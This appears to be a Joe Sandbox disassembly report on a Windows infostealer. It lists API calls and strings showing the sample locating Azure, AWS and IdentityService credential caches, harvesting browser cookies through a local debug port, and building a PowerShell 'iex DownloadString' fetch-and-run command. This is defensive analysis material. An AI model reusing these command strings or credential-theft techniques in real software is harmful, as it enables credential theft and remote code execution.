                        • Instruction Fuzzy Hash: 90A1A271A0120E9BDB21EFA5DD49ABF77B8EF44304F04406AFA05E7261DB78DD418B98
                        APIs
                        • memset.MSVCRT ref: 0050E740
                        • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0050E769
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050E79F
                        • lstrcat.KERNEL32(?,00000000), ref: 0050E7AD
                        • lstrcat.KERNEL32(?,\.azure\), ref: 0050E7C6
                        • memset.MSVCRT ref: 0050E805
                        • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0050E82D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050E85F
                        • lstrcat.KERNEL32(?,00000000), ref: 0050E86D
                        • lstrcat.KERNEL32(?,\.aws\), ref: 0050E886
                        • memset.MSVCRT ref: 0050E8C5
                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0050E8F1
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050E920
                        • lstrcat.KERNEL32(?,00000000), ref: 0050E92E
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0050E947
                        • memset.MSVCRT ref: 0050E986
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$memset$FolderPathlstrcpy
                        • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 4067350539-3645552435
                        • Opcode ID: 7b264939e06cba468b9c623fe2d53a9eee15dc3c51e0a571a41f5d88e82a3970
                        • Instruction ID: 9b906c4cc63568a47488b9aebaf8be7b3346a797e14a820a8e7735f3bbfb607d
                        • Opcode Fuzzy Hash: 7b264939e06cba468b9c623fe2d53a9eee15dc3c51e0a571a41f5d88e82a3970
                        • Instruction Fuzzy Hash: 5671E471E4022DABDB31EB64DD46FED7B74FF48700F144898B7199B1C0DAB49A848B58
                        APIs
                        • lstrcpy.KERNEL32 ref: 0050ABCF
                        • lstrlen.KERNEL32(0103DE88), ref: 0050ABE5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050AC0D
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0050AC18
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050AC41
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050AC84
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0050AC8E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050ACB7
                        • lstrlen.KERNEL32(00524AD4), ref: 0050ACD1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050ACF3
                        • lstrcat.KERNEL32(00000000,00524AD4), ref: 0050ACFF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050AD28
                        • lstrlen.KERNEL32(00524AD4), ref: 0050AD3A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050AD5C
                        • lstrcat.KERNEL32(00000000,00524AD4), ref: 0050AD68
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050AD91
                        • lstrlen.KERNEL32(0103DD68), ref: 0050ADA7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050ADCF
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0050ADDA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050AE03
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050AE3F
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0050AE49
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050AE6F
                        • lstrlen.KERNEL32(00000000), ref: 0050AE85
                        • lstrcpy.KERNEL32(00000000,0103DE28), ref: 0050AEB8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen
                        • String ID: f
                        • API String ID: 2762123234-1993550816
                        • Opcode ID: 469011fbf1fe49a670546cb9f24ce4e772c4a68b1b88a2b1a02ba348cfa36626
                        • Instruction ID: ab6f9f491c44d5c2d3a7099a5c97d952b5b59cb17cd88944a03dbcc42de11380
                        • Opcode Fuzzy Hash: 469011fbf1fe49a670546cb9f24ce4e772c4a68b1b88a2b1a02ba348cfa36626
                        • Instruction Fuzzy Hash: 4AB1D231A1121A9BDB32EF65CD49ABF7BB9FF00304F044429B905972A1DBB8DD01CB99
                        APIs
                        • LoadLibraryA.KERNEL32(ws2_32.dll,?,005072A4), ref: 005147E6
                        • GetProcAddress.KERNEL32(00000000,connect), ref: 005147FC
                        • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0051480D
                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0051481E
                        • GetProcAddress.KERNEL32(00000000,htons), ref: 0051482F
                        • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00514840
                        • GetProcAddress.KERNEL32(00000000,recv), ref: 00514851
                        • GetProcAddress.KERNEL32(00000000,socket), ref: 00514862
                        • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00514873
                        • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00514884
                        • GetProcAddress.KERNEL32(00000000,send), ref: 00514895
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                        • API String ID: 2238633743-3087812094
                        • Opcode ID: 6818fc0a8cbd163be9bda36d22127abe8653838618f31ea16c2c1d0d151b565c
                        • Instruction ID: c0c9d2c648123c13451fabd742782143049eff61ec2fe4998f101f44706ca908
                        • Opcode Fuzzy Hash: 6818fc0a8cbd163be9bda36d22127abe8653838618f31ea16c2c1d0d151b565c
                        • Instruction Fuzzy Hash: 86111871D52725EBC3709FB4BC0DE563EB8BE0A705709981AF291E21A0FAFD4012CB59
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050BE53
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050BE86
                        • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0050BE91
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050BEB1
                        • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0050BEBD
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050BEE0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0050BEEB
                        • lstrlen.KERNEL32(')"), ref: 0050BEF6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050BF13
                        • lstrcat.KERNEL32(00000000,')"), ref: 0050BF1F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050BF46
                        • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0050BF66
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050BF88
                        • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0050BF94
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050BFBA
                        • ShellExecuteEx.SHELL32(?), ref: 0050C00C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 4016326548-898575020
                        • Opcode ID: c87bc6a7a86748391344a6b34eb86fcd9b84b0bdf94dc7c6f57839e50b831bf0
                        • Instruction ID: c9a24be4bc8a98aa04fe7975056f0a508b3e1ec3001a8559fb718fe7f1655049
                        • Opcode Fuzzy Hash: c87bc6a7a86748391344a6b34eb86fcd9b84b0bdf94dc7c6f57839e50b831bf0
                        • Instruction Fuzzy Hash: C261B570E1121A9BEB21AFB6DD896AF7FA8FF05304F044429F605D7291DB78CD028B59
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0051184F
                        • lstrlen.KERNEL32(01026048), ref: 00511860
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00511887
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00511892
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005118C1
                        • lstrlen.KERNEL32(00524FA0), ref: 005118D3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005118F4
                        • lstrcat.KERNEL32(00000000,00524FA0), ref: 00511900
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0051192F
                        • lstrlen.KERNEL32(01026058), ref: 00511945
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0051196C
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00511977
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005119A6
                        • lstrlen.KERNEL32(00524FA0), ref: 005119B8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005119D9
                        • lstrcat.KERNEL32(00000000,00524FA0), ref: 005119E5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00511A14
                        • lstrlen.KERNEL32(01026088), ref: 00511A2A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00511A51
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00511A5C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00511A8B
                        • lstrlen.KERNEL32(010260F8), ref: 00511AA1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00511AC8
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00511AD3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00511B02
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcatlstrlen
                        • String ID:
                        • API String ID: 1049500425-0
                        • Opcode ID: c4609b3fc098217a4135949a6b098abe52c244b2c982c7dbf5403092c1aec713
                        • Instruction ID: e07d94a0135f7438875c5a4353ff2c3bca33d8c0a55be00dafc3f41297e10aeb
                        • Opcode Fuzzy Hash: c4609b3fc098217a4135949a6b098abe52c244b2c982c7dbf5403092c1aec713
                        • Instruction Fuzzy Hash: 22912FB160170B9BE7309FB6DD88A667BECFF04304F148469AA96C3251DB78DC81CB58
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 00504793
                        • LocalAlloc.KERNEL32(00000040,?), ref: 005047C5
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00504812
                        • lstrlen.KERNEL32(00524B60), ref: 0050481D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050483A
                        • lstrcat.KERNEL32(00000000,00524B60), ref: 00504846
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050486B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504898
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005048A3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005048CA
                        • StrStrA.SHLWAPI(?,00000000), ref: 005048DC
                        • lstrlen.KERNEL32(?), ref: 005048F0
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00504931
                        • lstrcpy.KERNEL32(00000000,?), ref: 005049B8
                        • lstrcpy.KERNEL32(00000000,?), ref: 005049E1
                        • lstrcpy.KERNEL32(00000000,?), ref: 00504A0A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00504A30
                        • lstrcpy.KERNEL32(00000000,?), ref: 00504A5D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                        • String ID: ^userContextId=4294967295$moz-extension+++
                        • API String ID: 4107348322-3310892237
                        • Opcode ID: 77d390b91b35232944ce00eabe41f0639ef6c86ef6e42aa873774e9336cd38e3
                        • Instruction ID: 527f0b6d50c8e74948d8859c78735f3e9ba2f387407c2c1ec4b87bd8e3505738
                        • Opcode Fuzzy Hash: 77d390b91b35232944ce00eabe41f0639ef6c86ef6e42aa873774e9336cd38e3
                        • Instruction Fuzzy Hash: 94B1B5B1B1120A9BCB31EF76D9499AF7BB9FF44304F044429FA4597291DB78EC028B94
                        APIs
                          • Part of subcall function 004F90C0: InternetOpenA.WININET(0051CFEC,00000001,00000000,00000000,00000000), ref: 004F90DF
                          • Part of subcall function 004F90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004F90FC
                          • Part of subcall function 004F90C0: InternetCloseHandle.WININET(00000000), ref: 004F9109
                        • strlen.MSVCRT ref: 004F92E1
                        • strlen.MSVCRT ref: 004F92FA
                          • Part of subcall function 004F8980: std::_Xinvalid_argument.LIBCPMT ref: 004F8996
                        • strlen.MSVCRT ref: 004F9399
                        • strlen.MSVCRT ref: 004F93E6
                        • lstrcat.KERNEL32(?,cookies), ref: 004F9547
                        • lstrcat.KERNEL32(?,00521794), ref: 004F9559
                        • lstrcat.KERNEL32(?,?), ref: 004F956A
                        • lstrcat.KERNEL32(?,00524B98), ref: 004F957C
                        • lstrcat.KERNEL32(?,?), ref: 004F958D
                        • lstrcat.KERNEL32(?,.txt), ref: 004F959F
                        • lstrlen.KERNEL32(?), ref: 004F95B6
                        • lstrlen.KERNEL32(?), ref: 004F95DB
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F9614
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                        • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                        • API String ID: 1201316467-3542011879
                        • Opcode ID: fd9216cf78953ac9c9cc7b5a3e6da5501e56c6c6e20628d02a2158ed44d00f94
                        • Instruction ID: b579df872f14d006a637db525ecb6b886b29d6cf006332773751b75f88c80534
                        • Opcode Fuzzy Hash: fd9216cf78953ac9c9cc7b5a3e6da5501e56c6c6e20628d02a2158ed44d00f94
                        • Instruction Fuzzy Hash: E4E12971E0021CEBDF14DFA8D980AEEBBB5BF48304F1444AAE609A7281DB749E45CF55
                        APIs
                        • memset.MSVCRT ref: 0050D9A1
                        • memset.MSVCRT ref: 0050D9B3
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0050D9DB
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050DA0E
                        • lstrcat.KERNEL32(?,00000000), ref: 0050DA1C
                        • lstrcat.KERNEL32(?,0103DF78), ref: 0050DA36
                        • lstrcat.KERNEL32(?,?), ref: 0050DA4A
                        • lstrcat.KERNEL32(?,0103CFE0), ref: 0050DA5E
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050DA8E
                        • GetFileAttributesA.KERNEL32(00000000), ref: 0050DA95
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050DAFE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                        • String ID:
                        • API String ID: 2367105040-0
                        • Opcode ID: 485fc6aa28837203f5d40cbb38b84230e310b62185a2d4c7e4d1d1c2541a7072
                        • Instruction ID: c69b4596d38a6e0e5ec54148a7a687972d3ccf4ada797801f82fa0b82de16411
                        • Opcode Fuzzy Hash: 485fc6aa28837203f5d40cbb38b84230e310b62185a2d4c7e4d1d1c2541a7072
